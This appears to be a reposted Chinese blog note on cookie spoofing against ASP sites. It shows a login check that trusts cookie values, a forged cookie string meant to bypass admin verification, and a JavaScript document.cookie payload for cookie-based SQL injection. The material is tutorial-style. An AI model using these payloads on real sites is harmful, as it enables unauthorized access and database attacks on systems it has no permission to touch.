Cookie欺骗

来源:互联网 发布:客服软件忠仕 编辑:程序博客网 时间:2024/05/22 12:02
Cookie文件名称格式:
你的用户名@产生的COOKIE的网页文件所在的WEB目录[COOKIE改变的次数].txt 如:
ibm@baidu[1].txt
设置cookie脚本

Set-Cookie: name = VALUE; expires = DATE; path = PATH; domain = DOMAIN_NAME;


<% if request.cookies("lunjilyb")("username")="" then response.redirect "login.asp" end if

if request.cookies("lunjilyb")("password")="" then response.redirect "login.asp" end if

if request.cookies("lunjilyb")("randomid")<>12 then response.redirect "login.asp" end if %>

构造如下语句:
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh


是否可以绕过管理员验证


桂林老兵cookies的欺骗工具


request获取变量的方式:request.form获取的是post数据,request.querystring获取的get数据,request.cookies获取的是cookie中的数据。
<%id=request("id")%>呢?这个时候程序是按以下顺序来搜索集合:querystring,form,cookie,servervariable。


利用javascript,可以在本地浏览器中设置cookie格式:name=value的属性是指定cookie数据项的名称,value是该名称对应的值,它是一个字符串。
要求:name和value中不能包含分号,逗号及空白。

cookies的注入语句:alert(document.cookie=“id=”+escape(“这就是asp? id=xx后面xx代表的数值) and (这里是注入攻击代码)”)); 如:alert(document.cookie=“id=”+escape(“50 “and 1=1”)
意思是设置调用当前创建的cookie数据项值,在设置cookie时,它们首先保存在浏览器的内存中,退出浏览器时,才能被写入到硬盘中.
语句解释:
(50“and 1=1”)有分号,逗号及空白,所以我们要用到escape()函数对他们进行编码。